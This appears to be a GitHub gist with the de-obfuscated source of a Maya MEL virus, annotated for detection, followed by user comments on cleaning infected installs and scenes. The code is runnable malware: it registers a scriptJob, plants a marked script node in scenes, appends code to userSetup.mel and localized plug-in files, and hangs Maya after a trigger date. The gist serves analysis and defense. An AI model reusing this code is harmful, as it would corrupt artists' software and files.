// Maya Mel UI Configuration File.Maya Mel UI Configuration File..
//
//
// This script is machine generated. Edit at your own risk.
//
//
////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Persistence routine. For every entry found under $MAYA_LOCATION/resources/l10n/
// it builds the path <entry>/plug-ins/animImportExport.pres.mel and checks whether
// that file already contains the marker line. If the marker is absent, the path is
// published through the global $Mel_file_address_lj and UI_Mel_Configuration_think_b
// is called; if the file cannot be copied, UI_Mel_Configuration_think_a is called.
// Artifacts a defender can look for: the marker line itself, and a short-lived
// "animImportExport.pres.mel.Mel" copy next to the localized file.
global proc UI_Mel_Configuration_think(){
string $localized_resources_path = `getenv MAYA_LOCATION`+("/resources/l10n/");
string $all_file[]=`getFileList -folder $localized_resources_path`;
string $localized_anim_strings_path =("/plug-ins/animImportExport.pres.mel");
// Global hand-off slot read by UI_Mel_Configuration_think_b; reset to "" here.
global string $Mel_file_address_lj=("");
// Visit each entry of the l10n folder (one per installed locale, presumably).
for ( $loc_folder_index = 0 ;$loc_folder_index<`size $all_file`;$loc_folder_index++)
{
string $Mel_file_address=($localized_resources_path+$all_file[$loc_folder_index]+$localized_anim_strings_path);
// Probe: copy the target to "<target>.Mel". The result is compared with 1, which
// the code treats as "copy succeeded" (file present and folder usable).
if (`sysFile -cp ($Mel_file_address+(".Mel")) ($Mel_file_address) ` == 1){
// Remove the probe copy again.
sysFile -del ($Mel_file_address+(".Mel"));
int $gc_xh=0;
string $Mel_File_LineBuffer[];
clear $Mel_File_LineBuffer;
// Open the localized file read-only.
$fileId=`fopen ($Mel_file_address) ("r")`;
$Mel_File_LineBuffer[0] = `fgetline $fileId`;
// Read line by line into the buffer; the loop stops at the first zero-length read.
while (` size $Mel_File_LineBuffer[$gc_xh]` != 0 ){
$gc_xh++;
$Mel_File_LineBuffer[$gc_xh] = `fgetline $fileId`;
}
fclose $fileId;
// Look for a buffered line that equals the marker string exactly.
int $isInfected = 0 ;
for ( $line_index=0; $line_index<`size $Mel_File_LineBuffer`; $line_index++) {
if ($Mel_File_LineBuffer[$line_index] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")) {
$isInfected=1;
// Force the loop condition false (used instead of a break).
$line_index=99999999;
}
}
// Marker not found: publish the path and let _think_b handle this file.
if ($isInfected == 0 ){
$Mel_file_address_lj=$Mel_file_address;
// whatIs guard: only call the helper if it is defined in this session.
if (`whatIs UI_Mel_Configuration_think_b` != "Unknown"){
UI_Mel_Configuration_think_b;
}
}
} else {
// Copy probe failed for this entry: fall back to the userSetup.mel routine.
// This branch sits inside the loop, so it runs once per failing entry.
if (`whatIs UI_Mel_Configuration_think_a` != "Unknown") {
UI_Mel_Configuration_think_a;
}
}
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Fallback persistence routine targeting userSetup.mel. The path is derived from
// `about -environmentFile`: the last two path components are dropped and
// "/scripts/userSetup.mel" is appended. If the file lacks the marker line (or did
// not exist and could be created), the before-script of the first scene script
// node whose text starts with the marker prefix is appended to it.
// Artifacts a defender can look for: the marker line in userSetup.mel and a
// short-lived "userSetup.mel..a" probe copy in the same folder.
global proc UI_Mel_Configuration_think_a(){
// Get the application defaults file path and split it on "/".
string $system_WDLJ = `about -environmentFile`;
string $buffer[];
tokenize $system_WDLJ "/" $buffer;
// Re-join all but the last 2 tokens into $buffer[0].
for($ii = 1; $ii < `size $buffer` - 2; $ii++) {
$buffer[0] = $buffer[0] + "/" + $buffer[$ii];
}
// $buffer[0] now names the targeted user setup script.
$buffer[0] = $buffer[0] + "/scripts/userSetup.mel";
// Set to 1 when userSetup.mel is usable and does not yet carry the marker.
int $pd_file_existence_check = 0;
// Existence probe: copy userSetup.mel to "<path>..a"; 1 is treated as success.
if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){
// File exists; remove the probe copy.
sysFile -del ($buffer[0]+"..a");
// Read userSetup.mel line by line until the first zero-length read.
int $ii=0;
string $NR_all[];
clear $NR_all;
$fileId=`fopen ($buffer[0]) "r"`;
$NR_all[0] = `fgetline $fileId`;
while (` size $NR_all[$ii]` != 0 ){
$ii++;
$NR_all[$ii] = `fgetline $fileId`;
}
fclose $fileId;
// $pdNR_all becomes 1 if any line equals the marker string exactly.
int $pdNR_all=0;
for ($ii = 0 ; $ii<`size $NR_all`;$ii++){
if ($NR_all[$ii] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")){
$pdNR_all = 1 ;$ii= 99999999;
}
}
// No marker line found: the file is eligible for the append below.
if ($pdNR_all == 0){
$pd_file_existence_check = 1;
}
}
// Copy probe failed; the code treats this as "file does not exist".
else {
// Create an empty userSetup.mel.
$sys_document = `fopen ($buffer[0]) "w"`;
fprint $sys_document ("");
fclose $sys_document;
// Repeat the copy probe to confirm the new file is usable.
if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){
// Remove the probe copy.
sysFile -del ($buffer[0]+"..a");
$pd_file_existence_check = 1;
}
}
if($pd_file_existence_check == 1){
// Enumerate the script nodes of the currently open scene.
string $script[] = `ls -type script`;
int $isInfected=0;
string $nr;
for ($ii = 0 ; $ii<`size $script`;$ii++){
// $nr holds the node's before-script text; compare its first 50 characters
// with the marker prefix.
$nr = `scriptNode -q -beforeScript $script[$ii]` ;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
// Force the loop to end; $nr keeps the matching node's text.
$ii = 999999999;
}
}
// A marked script node was found: append its before-script to userSetup.mel.
if ($isInfected == 1){
$fuck_All_U = `fopen ($buffer[0]) ("a")`;
fprint $fuck_All_U ($nr);
fclose $fuck_All_U;
}
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Appends the before-script of the first scene script node whose text starts with
// the marker prefix to the file named by the global $Mel_file_address_lj (set by
// UI_Mel_Configuration_think), then clears that global.
global proc UI_Mel_Configuration_think_b() {
global string $Mel_file_address_lj;
// Enumerate the script nodes of the currently open scene.
string $script[]=`ls -type script`;
int $isInfected=0;
string $nr;
for ($ii = 0 ; $ii<`size $script`; $ii++){
// Compare the first 50 characters of the node's before-script with the marker prefix.
$nr = ` scriptNode -q -beforeScript $script[$ii] ` ;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
// Force the loop to end; $nr keeps the matching node's text.
$ii = 999999999;
}
}
// A marked node was found: append its text to the target file and reset the global.
if ($isInfected == 1){
$fuck_All_U = ` fopen ($Mel_file_address_lj) ("a")`;
fprint $fuck_All_U ($nr);
fclose $fuck_All_U;
$Mel_file_address_lj=("");
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Scene-infection routine. If no script node in the open scene has a before-script
// starting with the marker prefix, it creates a script node named
// MayaMelUIConfigurationFile and sets its scriptType attribute to 1.
// Detection hint: a script node with that name, or any script node whose
// before-script begins with the marker line.
global proc autoUpdateAttrEd_SelectSystem(){
// Enumerate the script nodes of the currently open scene.
string $script[]=`ls -type script`;
int $isInfected = 0 ;
for ($ii = 0 ; $ii<`size $script`;$ii++){
// Compare the first 50 characters of the node's before-script with the marker prefix.
string $nr = `scriptNode -q -beforeScript $script[$ii] `;
string $infected_file_token = `substring $nr 1 50`;
if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){
$isInfected = 1;
// Force the loop to end.
$ii = 999999999;
}
}
if ($isInfected == 0 ){
// In this listing the new node's before-script is only the marker comment line.
string $chengxu =`scriptNode -n MayaMelUIConfigurationFile -beforeScript "// Maya Mel UI Configuration File.Maya Mel UI Configuration File.."`;
// scriptType 1 is the "Open/Close" type in Maya's scriptNode documentation,
// i.e. the before-script runs when the scene is opened.
setAttr ($chengxu+(".scriptType")) 1;
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Date-triggered denial of service: once the current date, read as a number, is
// 20200627 or later, the proc spins in an empty counting loop and Maya stops
// responding. The name differs from the dispatcher below by a single letter.
global proc autoUpdatcAttrEd(){
// Current date, split on "/"; the first three tokens are concatenated and
// converted to an int (the comparison below implies year, month, day order).
string $aboutCD = `about -cd`;
string $buffer[];
tokenize $aboutCD ("/") $buffer;
$buffer[0] = $buffer[0]+$buffer[1]+$buffer[2];
int $PuTianTongQing=$buffer[0];
// On or after 2020-06-27: empty loop whose condition stays true while the counter
// is positive. NOTE(review): whether the counter ever wraps and ends the loop is
// not established by this listing.
if ($PuTianTongQing >= 20200627 ){
for ($Ii=1 ; $Ii>0; $Ii++){
}
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Dispatcher run by the scriptJob that autoUpdatcAttrEnd registers. Each stage is
// called only if `whatIs` reports it as defined, in this order: date check,
// scene script-node creation, then startup-file persistence.
global proc autoUpdatoAttrEnd(){
// Stage 1: date-triggered hang.
if ( `whatIs autoUpdatcAttrEd` != "Unknown" ){
autoUpdatcAttrEd;
}
// Stage 2: add the marked script node to the open scene if it is missing.
if ( `whatIs autoUpdateAttrEd_SelectSystem` != "Unknown" ){
autoUpdateAttrEd_SelectSystem;
}
// Stage 3: write to the localized .pres.mel files or userSetup.mel.
if ( `whatIs UI_Mel_Configuration_think` != "Unknown" ){
UI_Mel_Configuration_think;
}
}
// ANALYSIS NOTE (de-obfuscated malware sample, kept for reference and detection).
// Bootstrap. Registers a scriptJob on the "SelectionChanged" event that calls
// autoUpdatoAttrEnd, and stores the job number in the global
// $autoUpdateAttrEd_aoto_int. Registration happens only while that global is 0,
// so a non-zero value set beforehand prevents the job from being registered.
// Detection hint: `scriptJob -listJobs` showing a SelectionChanged job that
// calls autoUpdatoAttrEnd.
global proc autoUpdatcAttrEnd(){
// Only proceed if the dispatcher proc is defined in this session.
if (`whatIs autoUpdatoAttrEnd` != "Unknown" ){
global int $autoUpdateAttrEd_aoto_int;
// 0 is the value the guard treats as "no job registered yet".
if($autoUpdateAttrEd_aoto_int == 0 ){
$autoUpdateAttrEd_aoto_int=`scriptJob -e ("SelectionChanged") ("autoUpdatoAttrEnd") `;
}
}
}
// Entry point: runs as soon as this script text is executed and calls the
// bootstrap proc that registers the SelectionChanged scriptJob.
autoUpdatcAttrEnd;

@lklzc0519 lklzc0519 commented Jun 23, 2020

您好 如果这个病毒中了的话需要怎么清除掉呢?谢谢

Owner Author

@OriginalAdric OriginalAdric commented Jun 23, 2020

@lklzc0519: 对不起,我不会中文。 我希望英语说明足够清楚。

To clean an infected environment:

Look for the obfuscated virus code in the files listed below. %MayaInstallRoot% is C:\Program Files\Autodesk\Maya2018, but for your specific Maya version. %language% is every installed translation (zh_CN, ja_JP, etc).

userSetup.mel
%MayaInstallRoot%/resources/l10n/%language%/plug-ins/animImportExport.pres.mel

The virus code will be under the header `// Maya Mel UI Configuration File.Maya Mel UI Configuration File..` (the marker line ends with two periods). It should be safe to delete that header and everything after it.

To clean an infected file after cleaning the environment:

  1. Open the file with script node execution disabled. To do this from the UI, click File > Open > [] to open the options, uncheck "Execute script nodes", then click the Open button. In Python, you can use cmds.file(filepath, open=True, executeScriptNodes=False)
  2. In Python, execute cmds.delete('MayaMelUIConfigurationFile') to delete the script node. You may need to account for namespacing or absolute object pathing in the delete command.
  3. Save the file

If the deadline has passed, you should be able to unlock the file for cleaning by setting your system time to a date before June 27, 2020.


@lklzc0519 lklzc0519 commented Jun 23, 2020

Owner Author

@OriginalAdric OriginalAdric commented Jun 23, 2020

I'm not 100% sure, as I haven't used that version of the tools or that script, and I am not very familiar with Cygwin. Looking at the scanAndCleanScriptNode file that ships with the Maya Security Tool plugin, the usage appears to be scanAndCleanScriptNode PATH. So, if your scenes are in C:/my/files, the command is probably scanAndCleanScriptNode /cygdrive/c/my/files for Cygwin.


@davidlatwe davidlatwe commented Jun 23, 2020

Putting these two lines in userSetup.mel should block the script.

// Mitigation for this sample: its bootstrap proc (autoUpdatcAttrEnd) registers the
// SelectionChanged scriptJob only while this global equals 0, so pre-seeding a
// non-zero value makes it skip the registration.
// NOTE(review): assumes userSetup.mel runs before the infected scene's script node;
// confirm. This does not remove the script node or the appended code, so infected
// scenes and startup files still need cleaning.
global int $autoUpdateAttrEd_aoto_int;
$autoUpdateAttrEd_aoto_int = -1;

@Videomaskinen Videomaskinen commented Jun 25, 2020

Put these two lines in userSetup.mel should block the script.

global int $autoUpdateAttrEd_aoto_int;
$autoUpdateAttrEd_aoto_int = -1;

What do these two lines do? Sorry if this is a novice question, I'm just an animator struggling to deal with this script exploit at work - I don't have much experience with scripts

Owner Author

@OriginalAdric OriginalAdric commented Jun 25, 2020

@Videomaskinen: it sets the global variable in which the exploit stores its scriptJob ID to an invalid value. The exploit only registers its scriptJob while that variable is 0, so Maya never actually runs the malicious code.


@ilbozo ilbozo commented Jul 8, 2020

I've just reviewed the Python code of the MayaClean plugin. It only checks whether the variable $fuck_All_U is in the file. So if the variable has a different name, the plugin is absolutely useless... Thanks Autodesk. It seems that the best option is to disable script node execution on load.


@JanPhKoch JanPhKoch commented Oct 30, 2020

I've just reviewed the python code of the MayaClean plugin. It just looks if the variable $fuck_All_U is in the file. So if the variable has a different name is absolutely useless... Thanks Autodesk. It seems that the best option is to disable the scriptNodes execution on load.

How would you do that? The scriptJobs still loading when Opening Files with that: https://knowledge.autodesk.com/support/maya/learn-explore/caas/CloudHelp/cloudhelp/2015/ENU/Maya/files/Script-nodes-Prevent-script-nodes-from-executing-when-you-open-a-file-htm.html
